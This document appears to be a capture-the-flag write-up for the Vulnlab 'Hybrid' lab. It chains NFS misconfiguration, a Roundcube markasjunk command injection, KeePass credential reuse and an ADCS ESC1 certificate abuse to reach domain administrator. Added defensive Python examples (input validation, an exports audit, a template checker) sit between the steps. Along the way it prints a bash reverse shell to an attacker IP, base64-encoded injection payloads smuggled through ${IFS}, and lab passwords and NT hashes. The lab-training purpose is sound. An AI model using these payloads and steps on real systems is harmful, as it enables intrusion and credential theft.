2023-07-12 22:25:38 +03:00

Vulnlab - Hybrid

dc01

NMAP

Nmap scan report for 10.10.177.197
Host is up (1.1s latency).
Not shown: 65523 filtered tcp ports (no-response)       
PORT      STATE SERVICE    VERSION                                     
53/tcp    open  tcpwrapped           
135/tcp   open  tcpwrapped
139/tcp   open  tcpwrapped           
445/tcp   open  tcpwrapped
464/tcp   open  tcpwrapped
3268/tcp  open  tcpwrapped
3389/tcp  open  tcpwrapped
|_ssl-date: 2023-07-09T15:21:51+00:00; -3s from scanner time.
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Issuer: commonName=dc01.hybrid.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-17T08:29:18
| Not valid after:  2023-12-17T08:29:18
| MD5:   503e6a310914a23a96f899c161496768
|_SHA-1: 8b350872418cb813302ad430acb1b1497acada2e
49669/tcp open  tcpwrapped
51915/tcp open  tcpwrapped
51928/tcp open  tcpwrapped
53128/tcp open  tcpwrapped
57220/tcp open  tcpwrapped
Host script results:
|_clock-skew: mean: -3s, deviation: 0s, median: -3s
| smb2-time: 
|   date: 2023-07-09T15:21:28
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required

PORT 445 (SMB)

From dc01, we only see the SMB service running, which we can try enumerating with an anonymous login, but that didn't work

mail01

NMAP

Nmap scan report for 10.10.177.198
PORT      STATE SERVICE  VERSION                        
22/tcp    open  ssh      OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)                           
| ssh-hostkey:         
|   256 60bc2226783cb4e06beaaa1ec1625dde (ECDSA)
|_  256 a3b5d86106e63a418845e35203d2231b (ED25519)
25/tcp    open  smtp     Postfix smtpd
|_smtp-commands: Couldn't establish connection on port 25   
80/tcp    open  http     nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu) 
110/tcp   open  pop3     Dovecot pop3d                  
111/tcp   open  rpcbind
143/tcp   open  imap     Dovecot imapd (Ubuntu)
587/tcp   open  smtp     Postfix smtpd                  
|_smtp-commands: Couldn't establish connection on port 587
993/tcp   open  ssl/imap Dovecot imapd (Ubuntu)
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Issuer: commonName=mail01
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-17T13:20:17
| Not valid after:  2033-06-14T13:20:17
| MD5:   38372b812fb16f03436025b4d26bdb29
|_SHA-1: 61c2400271ff7850e0da4a5ae256e7df666bb008
995/tcp   open  ssl/pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Issuer: commonName=mail01
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-17T13:20:17
| Not valid after:  2033-06-14T13:20:17
| MD5:   38372b812fb16f03436025b4d26bdb29
|_SHA-1: 61c2400271ff7850e0da4a5ae256e7df666bb008
2049/tcp  open  rpcbind
33893/tcp open  rpcbind
37693/tcp open  rpcbind
42661/tcp open  rpcbind
46025/tcp open  rpcbind
47609/tcp open  rpcbind

PORT 80 (HTTP)

mail01 had a web server running on port 80 which redirects to mail01.hybrid.vl

Adding the domain to the /etc/hosts file

This brings us to a Roundcube webmail login portal; trying default credentials like admin:admin didn't work

PORT 2049 (NFS)

mail01 had NFS running on port 2049; we can list the shares available to mount

showmount -e 10.10.177.198

We can mount this share with the following command

mount -t nfs 10.10.177.198:/opt/share /home/arz/VulnLab/Hybrid/share

In this directory we find backup.tar.gz

Extracting the archive

In the opt folder we find a certificate

And in /etc/dovecot we find the credentials for Roundcube mail

Logging in as peter.turner we see an email from admin talking about a spam filter

https://ssd-disclosure.com/ssd-advisory-roundcube-markasjunk-rce/

Foothold

Following an article on remote code execution in the markasjunk plugin, we can execute commands by changing a user's email address, using ${IFS}, the bash internal field separator variable, which by default represents a space, a tab and a newline character

admin&curl${IFS}10.8.0.136&@hybrid.vl

Now mark any email as junk

We get a callback on our listener, so the commands are being executed

We can get a reverse shell by base64 encoding the payload

bash -i >& /dev/tcp/10.8.0.136/2222 0>&1

admin&echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjAuMTM2LzIyMjIgMD4mMQo=${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash&@hybrid.vl

Doing the same procedure again, we get a reverse shell as www-data

In /home we only see one user, which is a domain user, peter.turner. I tried switching to peter using his Roundcube password but it didn't work
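The injection above works because the mailbox address is concatenated into a shell command line, where `&` ends the command and `${IFS}` stands in for a blocked space. Added example (not Roundcube's or the plugin's code): the vulnerable string-building pattern beside a hardened version that allow-lists the address and passes it as a single argv element; the `sa-learn` command is a hypothetical stand-in for whatever the plugin invokes.

```python
import re

# Strict allow-list for a mailbox address. Every shell metacharacter
# ('&', '|', ';', '$', '{', '}', quotes, whitespace) falls outside this set.
ADDRESS_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")

# Used only to explain *why* an address was rejected in audit output.
SHELL_META = set("&|;<>`$(){}\\\"' \t\n")


def unsafe_learn_cmdline(addr: str) -> str:
    """Vulnerable pattern: the address becomes part of a shell string.
    Run through a shell, 'admin&curl${IFS}host&@x' executes curl because
    '&' terminates the sa-learn command and ${IFS} expands to whitespace."""
    return f"sa-learn --spam --username {addr}"  # hypothetical command


def is_safe_address(addr: str) -> bool:
    """True only for a plain user@domain mailbox address."""
    return ADDRESS_RE.fullmatch(addr) is not None


def reject_reason(addr: str) -> str:
    """Explain a rejection; empty string when the address is acceptable."""
    if is_safe_address(addr):
        return ""
    bad = sorted(c for c in set(addr) if c in SHELL_META)
    if bad:
        return "shell metacharacters: " + repr("".join(bad))
    return "malformed address"


def build_learn_argv(addr: str, spam: bool = True) -> list:
    """Hardened pattern: validate, then build an argv list for
    subprocess.run() with no shell. The address is one literal argument,
    so neither '&' nor ${IFS} is ever interpreted."""
    if not is_safe_address(addr):
        raise ValueError(reject_reason(addr))
    return ["sa-learn", "--spam" if spam else "--ham", "--username", addr]
```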

I tried cracking the password of privkey.pem but it took a long time so I decided to give up on that

Reading the /etc/exports file, we see there's no no_root_squash, so we cannot place a bash binary owned by the root user

We know there's peter.turner on the victim machine with the UID 902601108

Before creating a user with the same UID on our machine we need to allow the creation of UIDs above the 60000 range

Edit /etc/login.defs and change the UID_MAX value

Now copy a bash binary into the mounted folder

We see that this binary is owned by peter.turner since we used the same UID, and it is SUID, but it wasn't executed due to a different GLIBC version, so instead we transfer the bash binary from the victim machine and make that one SUID
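The steps above work because root_squash only remaps UID 0: any other UID a client presents is trusted as-is, so matching a local user's UID is enough to own a SUID file on the export. Added example (not the lab's real /etc/exports): a small audit that parses export entries and flags the options a reviewer would want changed, including the missing all_squash that makes UID impersonation possible.

```python
import re

# Constructed sample /etc/exports; mirrors the situation described above
# (root_squash in effect by default, but UIDs otherwise trusted, open to any host).
SAMPLE_EXPORTS = """\
# constructed example, not the lab's real file
/opt/share *(rw,sync,no_subtree_check)
/srv/backup 10.10.0.0/16(rw,sync,no_root_squash)
/srv/public 10.10.177.0/24(ro,sync,all_squash)
"""

# One client token: host spec, optionally followed by (opt,opt,...)
CLIENT_RE = re.compile(r"^([^(]+)(?:\((.*)\))?$")


def parse_exports(text: str) -> list:
    """Return [(path, client, {options})] for every export entry."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()   # drop comments
        if not line:
            continue
        path, _, clients = line.partition(" ")
        for token in clients.split():
            m = CLIENT_RE.match(token)
            opts = m.group(2) or ""
            entries.append((path, m.group(1), {o for o in opts.split(",") if o}))
    return entries


def audit_exports(text: str) -> dict:
    """Map 'path client' -> list of findings (empty list when clean)."""
    findings = {}
    for path, client, opts in parse_exports(text):
        issues = []
        if "no_root_squash" in opts:
            issues.append("no_root_squash: client root writes files as server root")
        elif "all_squash" not in opts:
            # root is squashed, but every other client UID is believed verbatim:
            # a client that creates a user with a matching UID acts as that user.
            issues.append("no all_squash: client UIDs trusted, local users can be impersonated")
        if client == "*" and "ro" not in opts:
            issues.append("writable export to any host")
        findings[f"{path} {client}"] = issues
    return findings
```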

From peter's home directory, we find passwords.kdbx, a KeePass password database file

Opening the kdbx file with `kpcli`, it asks for a password

Peter's Roundcube password worked on this file

From the hybrid.vl entry we get peter's password

We can use this password to check peter's sudo privileges; he can run anything as root

Being root user we can access /etc/k

Running python-bloodhound to enumerate the trusted.vl domain

python3 /opt/BloodHound.py-Kerberos/bloodhound.py -d 'hybrid.vl' -u 'peter.turner' -p 'b0cwR+G4Dzl_rw' -gc 'dc01.hybrid.vl' -ns 10.10.132.229

In BloodHound, there wasn't any path from peter leading to Domain Admins

Enumerating ADCS with certipy for vulnerable certificate templates

certipy find -u peter.turner@hybrid.vl -p 'b0cwR+G4Dzl_rw' -vulnerable -stdout -dc-ip 10.10.228.165

Members of Authenticated Users can enroll and authenticate as any user with hybrid-DC01-CA (ESC1); using -old-bloodhound to get the result as a JSON file so we can view it in BloodHound

certipy find -u peter.turner@hybrid.vl -p 'b0cwR+G4Dzl_rw' -dc-ip 10.10.147.37 -old-bloodhound

https://raw.githubusercontent.com/ly4k/Certipy/main/customqueries.json

Make sure to add the custom queries for ADCS to ~/.config/bloodhound/customqueries.json to analyze ADCS in the domain

After adding the custom queries we see the templates reflected in BloodHound

Marking hybrid-DC01-CA as a high value target and checking the shortest path to hybrid-DC01-CA

So now we need MAIL01's hash; going back to the linux machine as root, we can extract the NT hash from /etc/krb5.keytab using https://github.com/sosdave/KeyTabExtract

From certipy we didn't find any template names; from BloodHound we see two templates, of which we use HYBRIDCOMPUTERS

On requesting the certificate, it gave an error related to a public key requirement

Checking the pem file we have, we see the size of its public key, which is 4096 bits

Specifying the public key size and requesting the certificate to authenticate as administrator

certipy req -u 'MAIL01$' -hashes ":0f916c5246fdbc7ba95dcef4126d57bd" -dc-ip "10.10.228.165" -ca 'hybrid-DC01-CA' -template 'HYBRIDCOMPUTERS' -upn 'administrator' -target 'dc01.hybrid.vl' -key-size 4096
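The ESC1 condition above comes from a combination of template settings: the enrollee chooses the subject (hence the arbitrary UPN), no approval or signatures are required, the EKU allows logon, and a broad group can enroll; the key-size error is the template's minimum key size. Added example (not certipy's code, and the template values are constructed, not the lab's real attributes): an audit function that evaluates those conditions from the relevant msPKI-* attribute values, with a hardened copy for contrast.

```python
# Bit values from the AD CS certificate-template schema.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag (manager approval)

# EKUs that make a certificate usable for logon (PKINIT / Schannel).
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
BROAD_PRINCIPALS = {"Authenticated Users", "Domain Users", "Domain Computers", "Everyone"}


def esc1_findings(template: dict) -> list:
    """Return the ESC1 conditions a template meets; all five together mean
    a low-privileged enrollee can obtain a logon certificate for any UPN."""
    hits = []
    if template["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        hits.append("enrollee supplies subject (UPN chosen by requester)")
    if not (template["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS):
        hits.append("no manager approval")
    if template["ra_signatures"] == 0:          # msPKI-RA-Signature
        hits.append("no authorized signatures required")
    if not template["ekus"] or template["ekus"] & AUTH_EKUS:
        hits.append("certificate usable for authentication")
    if template["enroll_rights"] & BROAD_PRINCIPALS:
        hits.append("enrollment open to a broad group")
    return hits


def is_esc1(template: dict) -> bool:
    return len(esc1_findings(template)) == 5


def min_key_size(template: dict) -> int:
    """msPKI-Minimal-Key-Size: a CSR with a smaller key is refused by the CA,
    which is the 'public key requirement' error mentioned above."""
    return template["min_key_size"]


# Constructed templates: RISKY resembles the HYBRIDCOMPUTERS description,
# HARDENED is a copy with the exposure removed (group name is hypothetical).
RISKY = {"name": "HYBRIDCOMPUTERS", "name_flag": 0x1, "enrollment_flag": 0x0,
         "ra_signatures": 0, "ekus": {"1.3.6.1.5.5.7.3.2"},
         "enroll_rights": {"Authenticated Users"}, "min_key_size": 4096}
HARDENED = dict(RISKY, name_flag=0x0, enrollment_flag=CT_FLAG_PEND_ALL_REQUESTS,
                enroll_rights={"Hybrid Server Admins"})
```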

Now, again with certipy, we can get administrator's NT hash

certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'hybrid.vl' -dc-ip 10.10.228.165

We can get a shell through wmiexec

wmiexec.py administrator@10.10.228.165 -hashes ':60701e8543c9f6db1a2af3217386d3dc'

References